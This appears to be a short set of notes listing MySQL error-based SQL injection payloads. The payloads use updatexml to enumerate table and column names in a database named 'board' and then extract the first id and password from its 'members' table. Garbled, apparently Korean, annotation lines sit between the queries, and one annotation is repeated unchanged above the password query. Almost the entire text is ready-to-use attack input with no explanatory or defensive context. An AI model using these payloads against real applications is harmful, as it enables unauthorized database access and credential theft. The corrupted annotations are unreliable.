' and updatexml (0x0a,concat(0x0a,(SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema='board' LIMIT 0,1)),0x0a) #
' and updatexml (0x0a,concat(0x0a,(SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema='board' LIMIT 1,1)),0x0a) #
' and updatexml (0x0a,concat(0x0a,(SELECT COLUMN_NAME FROM information_schema.columns WHERE table_schema='board' LIMIT 0,1)),0x0a) #
' and updatexml (0x0a,concat(0x0a,(SELECT COLUMN_NAME FROM information_schema.columns WHERE table_schema='board' LIMIT 1,1)),0x0a) #
board ๋ฐ์ดํฐ ๋ฒ ์ด์ค์ members์ ์๋ id ์ฒซ๋ฒ์งธ ๋ฐ์ดํฐ ํ์ธ
' and updatexml (0x0a,concat(0x0a,(SELECT id FROM members LIMIT 0,1)),0x0a) #
board ๋ฐ์ดํฐ ๋ฒ ์ด์ค์ members์ ์๋ id ์ฒซ๋ฒ์งธ ๋ฐ์ดํฐ ํ์ธ
' and updatexml (0x0a,concat(0x0a,(SELECT password FROM members LIMIT 0,1)),0x0a) #